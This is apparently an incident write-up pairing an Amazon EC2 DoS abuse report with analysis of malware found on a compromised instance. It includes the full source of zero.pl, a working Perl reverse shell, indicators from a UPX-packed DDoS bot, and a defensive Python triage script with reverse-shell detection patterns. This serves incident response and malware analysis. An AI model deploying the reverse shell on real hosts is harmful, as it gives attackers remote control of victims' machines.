Virus/zero.pl
From: Amazon EC2 Abuse
Subject: Your Amazon EC2 Abuse Report [16614771493-2]
Date: July 7, 2014 at 6:41:49 AM MST
Reply-To: Amazon EC2 Abuse <ec2-abuse@amazon.com>

Dear Amazon EC2 Customer,

We've received a report that your instance(s):

Instance Id: i-XXXXXXXX

has been making Denial of Service attacks against remote hosts on the Internet. Check the information provided below by the abuse reporter. This is specifically forbidden in our User Agreement: http://aws.amazon.com/agreement/

Please immediately restrict the flow of traffic from your instance(s) to cease disruption to other networks and reply to this email to send your reply of action to the original abuse reporter. This will activate a flag in our ticketing system, letting us know that you have acknowledged receipt of this email.

It's possible that your environment has been compromised by an external attacker. It remains your responsibility to ensure that your instances and all applications are secured. The link http://developer.amazonwebservices.com/connect/entry.jspa?externalID=1233 provides some suggestions for securing your instances.

It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to IP XXX.XXX.XXX.XXX via UDP port(s) 80. Please investigate your instance(s) and reply detailing the corrective measures you will be taking to address this activity.

Case number: 16614771493-1

Additional abuse report information provided by original abuse reporter:
* Destination IPs:
* Destination Ports:
* Destination URLs:
* Abuse Time: Mon Jul 07 13:25:43 UTC 2014
* Log Extract:
<<<
It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to IP 116.31.100.90 via UDP port(s) 80. Please investigate your instance(s) and reply detailing the corrective measures you will be taking to address this activity. In the meantime, we have blocked outbound UDP 80 on the instance(s) to prevent further abuse.

If you believe that you were compromised by an external attacker, the best recourse is to back up your data, migrate your applications to a new instance, and terminate the old one. Attempting to repair a compromised instance does not guarantee a successful cleanup in most cases. We recommend reviewing the following resources to ensure your EC2 environment is properly secured:
* Amazon EC2 Security Groups User Guide: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
* AWS Security Resources: http://aws.amazon.com/security/security-resources/
* AWS Security Best Practices: https://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf

Thanks in advance for your attention to this report.
Files found:
- c3fd28831d9fc683000273643b5bef12  zero.pl
- 4206e8b780cf3758baa76b1002e61792  .Linux_time_y_2015
Guessing they somehow came through a security exploit in ElasticSearch.
zero.pl: (also found here: [1])
```perl
#!/usr/bin/perl -w
use strict;
use Socket;
use IO::Handle;

# Usage: zero.pl Remote_IP Remote_Port
if ($#ARGV + 1 != 2) {
    print "$#ARGV $0 Remote_IP Remote_Port \n";
    exit 1;
}

my $remote_ip   = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto       = getprotobyname("tcp");
my $pack_addr   = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell       = '/bin/bash -i';

# Outbound TCP connection to the operator-supplied host/port.
socket(SOCK, AF_INET, SOCK_STREAM, $proto);
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK, $pack_addr) or die "can not connect:$!";

# Classic reverse shell: stdin/stdout/stderr are duplicated onto the socket,
# then an interactive bash is handed to whoever is listening on the far end.
open STDIN,  "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "Enjoy the shell.\n";
system($shell);
close SOCK;
exit 0;
```
.Linux_time_y_2015: (binary)
- statically linked executable
- file: linux: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
- strings:
  - "This file is packed with the UPX executable packer http://upx.sf.net"
- upx decompressed strings:
  - "std::basic_string" -- implies it was a C++ source file
  - "Keld Simonsen" -- fluke? compiler?
  - "keld@dkuug.dk"
  - "+45 3122-6543"
  - "+45 3325-6543"
  - "1997-12-20"
  - "ISO/IEC JTC1/SC22/WG20 - internationalization"
  - "C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V"
    - (the seven strings above are the LC_IDENTIFICATION record compiled into glibc's C locale; they are present because the binary is statically linked and say nothing about the malware author)
  - "GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)" -- compiler
- Source files mentioned: (possibly related: [2])
  - Fake.cpp
  - Global.cpp
  - main.cpp
  - Manager.cpp
  - ServerIP.cpp
  - StatBase.cpp
  - ThreadAttack.cpp
  - ThreadHostStatus.cpp
  - ThreadTaskManager.cpp
  - ThreadTimer.cpp
  - AutoLock.cpp
  - FileOp.cpp
  - Log.cpp
  - Md5.cpp
  - Media.cpp
  - NetBase.cpp
  - ThreadCondition.cpp
  - Thread.cpp
  - ThreadMutex.cpp
  - Utility.cpp
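As an added example (not from the original page), a small Python triage script that automates the hand checks above: md5, a `file`-style read of the ELF ident bytes, the UPX stub marker, `strings`-style extraction of the compiler tag and .cpp source-file names, and a check for the reverse-shell traits of zero.pl (connect(), the standard streams duped onto the socket, a shell spawned). The sample inputs are constructed and the function names are my own.

```python
import hashlib
import re
import struct

UPX_MARKER = b"This file is packed with the UPX executable packer"  # UPX stub string
ELF_MACHINES = {0x03: "Intel 80386", 0x3E: "x86-64", 0x28: "ARM"}
# Traits of zero.pl: connect(), STDIN/STDOUT/STDERR duped onto the socket, shell spawned.
PERL_SHELL_TRAITS = (r"\bconnect\s*\(", r'open\s+STD(IN|OUT|ERR)\s*,\s*"[<>]&',
                     r"\b(system|exec)\s*\(")

def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Approximate `strings`: runs of printable ASCII at least min_len long."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def describe_elf(data: bytes):
    """`file`-style summary from the ELF ident bytes; None if not an ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(data[4], "?")
    endian = {1: "LSB", 2: "MSB"}.get(data[5], "?")
    e_type, e_machine = struct.unpack(("<" if data[5] == 1 else ">") + "HH", data[16:20])
    kind = {1: "relocatable", 2: "executable", 3: "shared object"}.get(e_type, "?")
    return f"ELF {bits}-bit {endian} {kind}, {ELF_MACHINES.get(e_machine, hex(e_machine))}"

def triage(data: bytes) -> dict:
    """Collect the indicators the write-up above reads off by hand."""
    strs = printable_strings(data)
    text = data.decode("latin-1")
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "file": describe_elf(data),
        "upx_packed": UPX_MARKER in data,
        "compiler": next((s for s in strs if s.startswith("GCC: ")), None),
        "source_files": sorted(set(re.findall(r"[\w.-]+\.cpp\b", text))),
        "cpp_runtime": "std::basic_string" in text,
        "perl_reverse_shell": all(re.search(p, text) for p in PERL_SHELL_TRAITS),
    }

# Constructed samples: a fake i386 ELF header followed by strings of the kind seen
# above (packed and unpacked traits combined), and a zero.pl-style Perl fragment.
SAMPLE_ELF = (b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8 + struct.pack("<HH", 2, 3)
              + b"\x00" * 32 + UPX_MARKER + b" http://upx.sf.net\x00"
              + b"GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)\x00"
              + b"ThreadAttack.cpp\x00Md5.cpp\x00std::basic_string\x00")
SAMPLE_PERL = (b'socket(SOCK, AF_INET, SOCK_STREAM, $proto);\nconnect(SOCK,$pack_addr);\n'
               b'open STDIN, "<&SOCK";\nopen STDOUT, ">&SOCK";\nsystem("/bin/bash -i");\n')
```

On a real sample run `triage(open(path, "rb").read())` against both the packed file and the `upx -d` output, since the compiler and source-file strings only appear after unpacking.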